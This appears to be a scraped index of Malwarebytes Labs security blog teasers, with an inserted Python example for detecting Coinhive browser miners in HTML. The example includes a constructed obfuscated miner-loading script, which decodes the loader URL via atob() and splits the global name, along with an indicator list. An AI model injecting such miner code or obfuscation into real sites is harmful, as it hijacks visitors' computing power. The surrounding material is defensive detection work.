Kaseya Unitrends has unpatched vulnerabilities that could help attackers expand a breach
It must not be easy to work at Kaseya right now. While they are working as hard as they can to help customers, and customers of their customers, recover from the REvil ransomware attack at the beginning of July, a new vulnerability in their software has been disclosed. As a side note, Kaseya...
A week in security (October 26 – November 1)
We had a very busy week at Malwarebytes Labs. We offered advice on Google's patch for an actively exploited zero-day bug that affects Chrome users, our podcast talked about finding consumer value in Cybersecurity Awareness Month with Jamie Court, we provided guidance about keeping ransomware cash...
A week in security (July 22 – 28)
Last week on Malwarebytes Labs, we offered an extensive analysis of the Malaysian Airlines Flight 17 investigation, updated users on the newest feature set for AdwCleaner 7.4.0 (it now detects pre-installed software), and provided a deep dive into Phobos ransomware. We also broke down the latest...
Can search extensions keep your searches private?
One of the most common things most of us do on the Internet is search, whether we are looking up the price of the latest gadget or we need to find the address of that great restaurant recommended by a friend. The dizzying number of Google search queries per second (more than 40,000, on average) tel...
Badgelife: A Defcon 26 retrospective
One more year gone, one more Defcon completed. Defcon is the longest-running security conference in existence and one that I have been attending since Defcon 18. It is an opportunity to see and interact in real life with industry peers that would forever remain a digital persona otherwise. It is...
Major data breaches at Adidas, Ticketmaster pummel web users
There have been a number of data breaches and accidental data exposures coming to light in the last few days, and no matter where in the world you happen to be located, you'll want to do some due diligence and see if you've been affected. These aren't small fish being preyed upon by black hats;...
A week in security (May 21 – May 27)
Last week we told you about a Mac cryptominer using XMRig, an overview of Dreamcast related scams, part 1 of decoding Emotet, and what to do about bad coding habits that die hard. We also published the results of our second CrackMe contest. Other news How a pioneer of machine learning became one ...
Far Cry 5 download offers: embrace the power of “no”
The recently released Far Cry 5 is a video game where you reclaim Montana from a cult obsessed with the "power of yes" by hitting members over the head with a shovel. It's also one of the biggest sellers for publisher Ubisoft to date, and it stands to reason that many people would like to grab a...
A week in security (April 09 – April 15)
Last week, we took a look at a malware campaign called FakeUpdates, methods to use secure instant messaging, the inner workings of a decryption tool, and some Facebook spam campaigns. We also published our first quarterly Malwarebytes Labs CTNT report of 2018. Other news A security researcher...
Malicious cryptomining and the blacklist conundrum
When Coinhive first came out in September of 2017, it was fairly easy to identify websites using browser miners by looking for a few lines referencing the Coinhive API within the HTML source code. Because this was a new phenomenon, even bad actors didn't have to hide their intentions, and...
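The source-inspection heuristic described above, and why it stops working once miners hide their intentions, as an added Python example (not code from the Malwarebytes post). The Coinhive script URL and the `CoinHive` global are the publicly documented API names of the time; the two HTML snippets are constructed for the example, not captured from a real site.

```python
"""Detect Coinhive-style browser-mining references in HTML source.

Added example: a keyword scan of the page source (the early technique),
followed by a second pass that decodes atob() payloads and joins split
string literals so the same indicators are found after light obfuscation.
"""
import base64
import re

# Publicly documented Coinhive indicators (the loader URL and the global
# object exposed by the library); case-sensitive substring matches.
PLAIN_INDICATORS = (
    "coinhive.com/lib/coinhive.min.js",
    "CoinHive",
)

# --- constructed sample pages -------------------------------------------

# An early, un-hidden miner: the API is referenced in clear text.
PLAIN_HTML = """<html><body>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY'); miner.start();</script>
</body></html>"""

# The same miner with the loader URL base64-encoded and the global name
# built from two string halves, so neither indicator appears literally.
_B64_URL = base64.b64encode(
    b"https://coinhive.com/lib/coinhive.min.js").decode("ascii")
OBFUSCATED_HTML = f"""<html><body>
<script>
var s = document.createElement('script');
s.src = atob('{_B64_URL}');
document.head.appendChild(s);
var ctor = 'Coin' + 'Hive';
var miner = new window[ctor].Anonymous('SITE_KEY');
miner.start();
</script>
</body></html>"""

# --- detection ------------------------------------------------------------

def find_plain_indicators(html: str) -> list:
    """The original heuristic: grep the raw HTML for known API references."""
    return [ind for ind in PLAIN_INDICATORS if ind in html]


_ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
_CONCAT_RE = re.compile(r"['\"]([^'\"]*)['\"]\s*\+\s*['\"]([^'\"]*)['\"]")


def normalize(html: str) -> str:
    """Append decoded atob() payloads and collapse 'a' + 'b' literals."""
    out = html
    for b64 in _ATOB_RE.findall(html):
        try:
            out += "\n" + base64.b64decode(b64).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            pass  # not valid base64; leave the raw text for the scan
    # Join concatenated literals until nothing changes (handles chains).
    prev = None
    while prev != out:
        prev = out
        out = _CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", out)
    return out


def find_indicators(html: str) -> list:
    """Obfuscation-aware scan: normalize first, then apply the same list."""
    return find_plain_indicators(normalize(html))


if __name__ == "__main__":
    print("plain page, raw scan:      ", find_plain_indicators(PLAIN_HTML))
    print("obfuscated page, raw scan: ", find_plain_indicators(OBFUSCATED_HTML))
    print("obfuscated page, normalized:", find_indicators(OBFUSCATED_HTML))
```

The raw scan finds both indicators on the plain page and nothing on the obfuscated one; only after decoding and joining strings does the second page match. That is the conundrum: every string the blocklist relies on can be rewritten, and the scanner also fires on any page that merely mentions the library in prose (it reads the whole document, not only script bodies), so a hit should be confirmed by what the page actually loads and executes rather than by its source text alone.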
The digital entropy of death: link rot
Hot on the heels of a grim blog about digital death comes…another blog about digital death. Except in this case, the recently deceased would be the links that tie the web together, otherwise known as link rot. Link rot is a weird thing. Say I blog for Puppy Chow and I write an article about the...
Know your threats: the nine scariest malware monsters
It's been a particularly ghoulish year in cybersecurity, from Russian hacks to ransomware outbreaks. The bad boogey man in the black hoodie has been pulling one over the collective public. It's dark and creepy, but users refuse to stop peeking behind the door. It's enough to make even the most...
BlueBorne – Bluetooth’s airborne influenza
Armis Labs has discovered a new attack vector that targets any device that has Bluetooth capability. This includes mobile, desktop, and IoT — roughly accounting for 8.2 billion devices. All operating systems are susceptible — Android, iOS, Windows, and Linux. Dubbed BlueBorne, it exposes several...
How Outlook notification sounds can lead to zero-click exploits
An Akamai researcher has found two vulnerabilities in Windows that can be combined to achieve a full, zero-click remote code execution (RCE) in Outlook. Both vulnerabilities were responsibly disclosed to Microsoft and addressed in the August 2023 and October 2023 Patch Tuesdays, so the researcher...
Rubrik is latest victim of the Clop ransomware zero-day campaign
Rubrik, a cybersecurity company specializing in cloud data management, has revealed that some of its systems were infiltrated by the Clop ransomware group. Rubrik is one of many companies attacked by Clop via an infamous zero-day vulnerability in the GoAnywhere file transfer software. The attack...
Update now! Mozilla patches two actively exploited vulnerabilities
Mozilla has announced it has fixed security vulnerabilities in Firefox 97.0.2, Firefox ESR 91.6.1, Firefox for Android 97.3.0, and Focus 97.3.0. Users should install the out-of-band security update as soon as possible, since it is designed to apply a fix for two vulnerabilities that are known to ...
Update now! Chrome patches actively exploited zero-day vulnerability
Google has released an update for its Chrome browser that includes eleven security fixes, one of which has been reportedly exploited in the wild. The vulnerability that is reported as being exploited in the wild has been assigned CVE-2022-0609. The vulnerability is described as a...
A week in security (May 6 – 12)
Last week on Labs, we discussed what to do when you discover a data breach, how 5G could impact cybersecurity strategy, the top six takeaways for user privacy, vulnerabilities in financial mobile apps that put consumers and businesses at risk, and in our series about vital infrastructure, we...
Labs Cybercrime Tactics and Techniques report finds businesses hit with 235 percent more threats in Q1
The Malwarebytes Labs Cybercrime Tactics and Techniques Q1 2019 report found businesses at the butt end of a bad joke. In just one year, threats aimed at corporate targets have increased by 235 percent, with Trojans, such as Emotet, and ransomware in particular revving up in the first quarter...
Green card scams: preying on the desperate
Thanks to @nullcookies for providing leads. Most online scams depend on two things for success: a broken or otherwise onerous process to deal with a legitimate entity, and a desperate target population. With immigration, there are many, many burdensome processes to navigate, and most applicants...
Encryption 101: a malware analyst’s primer
While most in the security industry know what encryption is, many lack a basic understanding of how it is used in malware—especially ransomware. Because of this, we thought it would be beneficial to do an introductory primer on encryption mechanisms and how they are exploited for malicious...
Hansa Market on Dark Web seized by Dutch police
In a simultaneous press conference issued by the Dutch police and US Attorney General Jeff Sessions, we learned that the Dark Web marketplaces AlphaBay and Hansa Market have been seized and shut down by international cooperating authorities. As it turned out, Hansa Market was already under control...
A .NET malware abusing legitimate ffmpeg
There is a growing trend among malware authors to incorporate legitimate applications in their malicious package. This time, we analyzed a malware downloading a legitimate ffmpeg. Using this application, this simple spyware written in .NET got a powerful feature. Most of the malware is sufficient...
Update vRealize now! VMware patches critical RCE vulnerabilities
VMware has issued a security advisory for vRealize Log Insight that covers four vulnerabilities reported privately by the Zero Day Initiative (ZDI). Two of these vulnerabilities are rated as critical. The issues have been fixed in vRealize Log Insight 8.10.2, so users should upgrade to the latest...
Update now! Apple patches zero-day vulnerability affecting Macs, Apple Watch, and Apple TV
Apple has released security updates for a zero-day vulnerability that affects multiple products, including Mac, Apple Watch, and Apple TV. The flaw is an out-of-bounds write issue—tracked as CVE-2022-22675—in AppleAVD, a decoder that handles specific media files. An out-of-bounds write or read fl...
The Conti ransomware leaks
On February 27, an individual with insights into the Conti ransomware group started leaking a treasure trove of data beginning with internal chat messages. Conti is responsible for a number of high profile attacks, including one against the Irish Healthcare system which has cost more than $48...
BrakTooth Bluetooth vulnerabilities, crash all the devices!
Security researchers have revealed details about a set of 16 vulnerabilities that impact the Bluetooth software stack that ships with System-on-Chip (SoC) boards from several popular vendors. The same group of researchers disclosed the SweynTooth vulnerabilities in February 2020. They decided to du...
Website misconfigurations and other errors to avoid
Website owners, listen up: There are lots of things you shouldn’t do with your site, and many more you should avoid with the domains you’re responsible for. Insider malice, bad luck, and the stars aligning in impossible ways can all give your online portfolio a bad hair day. However, if you want ...
Discord users tempted by bots offering “free Nitro games”
The last few weeks have seen multiple instances of problematic bots appearing in Discord channels. They bring tidings of gifts, but the reality is quite a bit different. Given so many more young kids and teens are at home during the current global lockdown, they may well see this scam bouncing...
APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure
The coronavirus (COVID-19) has become a global pandemic, and this is a golden time for attackers to take advantage of our collective fear to increase the likelihood of a successful attack. True to form, they've been doing just that: performing spam and spear phishing campaigns using coronavirus as a...
CEOs offer their own view of a US data privacy law
Last week, the chief executives of more than 50 mid- and large-sized companies urged Congress to pass a national data privacy law to regulate how companies collect, use, and share Americans’ data. Buried deep within the chief executives’ recommendations for such a law, presented as a policy...
A week in security (February 11 – 17)
Last week on Malwarebytes Labs we discussed the return of the Sextortion Bitcoin scams, we gave you an early overview of the exploit kits in the winter of 2019, we talked about the destruction of VFEmail service, for consumers we discussed whether you should remove yourself from social media, for...
Web skimmers compete in Umbro Brasil hack
Umbro, the popular sportswear brand, has had its Umbro Brasil website hacked and injected with not one but two web skimmers, part of the Magecart group. Magecart has become a household name in recent months due to high profile attacks on various merchant websites. Criminals can seamlessly steal...
Did my comment on your blog get lost?
If you ever feel bad about your job because of mindless tasks you must perform day after day, or if you're bothered by the fact that your chosen work pays crap, produces nothing useful, and helps no one: have a look at blog comment spammers and breathe a sigh of relief. They make almost any job...
Internet Safety Month: How to protect your child’s privacy online
June marks the beginning of summer. It is also National Internet Safety Month. This is the perfect time to remind vacationers that while it is essential to check that everything you need is packed and ready for a trip, it is equally vital for the family to take steps in securing their devices and...
Solution Corner: Malwarebytes for Mac
Mac users have been told for years: Macs don't get viruses. Even Apple said so, in their famous Get a Mac ads that aired a decade ago. Wow, that's so cool! It's good to know we're all safe. Now, on a different topic, can you tell me why Safari is going to a Russian search engine instead of Google...
Bye, bye Petya! Decryptor for old versions released.
Following the outbreak of the Petya-based malware in Ukraine, the author of the original version, Janus, decided to release his master key, probably closing the project. You can read the full story here. Based on the released key, we prepared a decryptor that is capable of unlocking all the...
Exim finally fixes 3 out of 6 vulnerabilities
Exim is a message transfer agent (MTA) originally developed at the University of Cambridge for use on Unix systems connected to the internet, and is freely available under the terms of the GNU General Public Licence. Even though the name may be new to you, a Shodan search revealed 3.5 million serve...
Would real identities make social media safer?
“Use real identities to reduce abuse online” is a talking point you've almost certainly seen down the years. It also seems to come around like clockwork every other month, and is currently a hot topic in the UK after prominent journalists / media personalities raised the issue. It’s an interesting...
Misleading cybersecurity lessons from pop culture: how Hollywood teaches to hack
In pop culture, cybercrimes are often portrayed as mysterious and unrealistic. Hackers are enigmatic and have extraordinary tech abilities. They can discover top secrets in a short time and type at breakneck speed to hack into a database. In real life, though, hacking is not that straightforward...
Fintech security: the challenges and fails of a new era
"I have no idea how this app from my bank works, and I don't trust what I don't understand." Josh is not an old curmudgeon or luddite. He's 42 with a decent understanding of technology. Nevertheless, the changes in fintech have come too fast for him. It's not that he doesn't trust his bank. He...
Threat spotlight: Phobos ransomware lives up to its name
Ransomware has struck dead on organizations since it became a mainstream tool in cybercriminals' belts years ago. From massive WannaCry outbreaks in 2017 to industry-focused attacks by Ryuk in 2019, ransomware's got its hooks in global businesses and shows no signs of stopping. That includes a...
Billion-dollar search engine industry attracts vultures, shady advertisers, and cybercriminals
Search engines make money by showing users sponsored advertisements—a lot of money. This attracts attention, competition, and plenty who want a piece of the action without doing the actual work or considering the impact to those on the other end of the search bar. Because in the search business,...
New version of IcedID Trojan uses steganographic payloads
This blog post was authored by @hasherezade, with contributions from @siriurz and Jérôme Segura. Security firm Proofpoint recently published a report about a series of malspam campaigns they attribute to a threat actor called TA2101. Originally targeting German and Italian users with Cobalt Strik...
White hat, black hat, and the emergence of the gray hat: the true costs of cybercrime
This post was written by Michael Osterman of Osterman Research. Osterman Research recently completed a major survey on behalf of Malwarebytes to determine the actual cost of cybercrime to businesses. Many studies have focused on the cost of lost reputation, lost future business, and other...
A week in security (July 2 – July 8)
Last week, we tracked back a large mining operation from their Coinhive shortlink, we took a look at online project management tools, we described a new macro-less technique to distribute malware, and talked about a Mac malware that targets crypto-mining users. Other news: Huawei enterprise comms...
Mac malware OSX.Proton strikes again
The hackers responsible for the Mac malware OSX.Proton have struck again, this time infecting a copy of the Elmedia Player app that was being distributed from the official Eltima website. At this time, it is still unknown how long their website was providing the hijacked app. Proton was silently...
Google patches critical vulnerability for Androids with Qualcomm chips
In April’s update for the Android operating system (OS), Google has patched 28 vulnerabilities, one of which is rated critical for Android devices equipped with Qualcomm chips. You can find your device’s Android version number, security update level, and Google Play system level in your Settings ap...
Pegasus spyware and how it exploited a WebP vulnerability
Recent events have demonstrated very clearly just how persistent and wide-spread the Pegasus spyware is. For those that have missed the subtle clues, we have tried to construct a clear picture. We attempted to follow the timeline of events, but have made some adjustments to keep the flow of the...
InfraGard infiltrated by cybercriminal
InfraGard, a partnership between the FBI and members of the private sector that was established to protect critical infrastructure in the US, has been infiltrated by a cybercriminal. As a result, its database of contact information is now for sale on an English-language cybercrime forum. InfraGar...